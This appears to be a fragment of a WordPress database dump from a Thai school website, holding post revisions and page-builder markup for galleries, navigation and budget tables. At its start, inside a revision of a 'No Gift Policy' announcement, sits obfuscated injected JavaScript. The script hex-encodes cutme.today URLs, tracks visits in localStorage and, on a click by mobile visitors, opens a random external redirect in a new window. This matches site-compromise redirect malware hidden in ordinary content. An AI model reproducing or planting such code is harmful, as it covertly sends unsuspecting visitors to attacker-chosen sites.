_0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่','','inherit','closed','closed','','859-revision-v1','','','2025-06-09 13:40:27','2025-06-09 06:40:27','',859,'http://pakhaeng.ssk.in.th/?p=1312',0,'revision','',0),
(1314,1,'2025-06-09 14:05:47','2025-06-09 07:05:47','','1','','inherit','','closed','','1-3','','','2025-06-09 14:05:47','2025-06-09 07:05:47','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png',0,'attachment','image/png',0),
(1315,1,'2025-06-09 14:06:03','2025-06-09 07:06:03','','2','','inherit','','closed','','2-4','','','2025-06-09 14:06:03','2025-06-09 07:06:03','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png',0,'attachment','image/png',0),
(1316,1,'2025-06-09 14:07:01','2025-06-09 07:07:01','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</td></tr><tr><td>แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</td></tr><tr><td>คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</td></tr><tr><td>ข้อมูลเชิงสถิติการให้บริการ</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</td></tr><tr><td>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 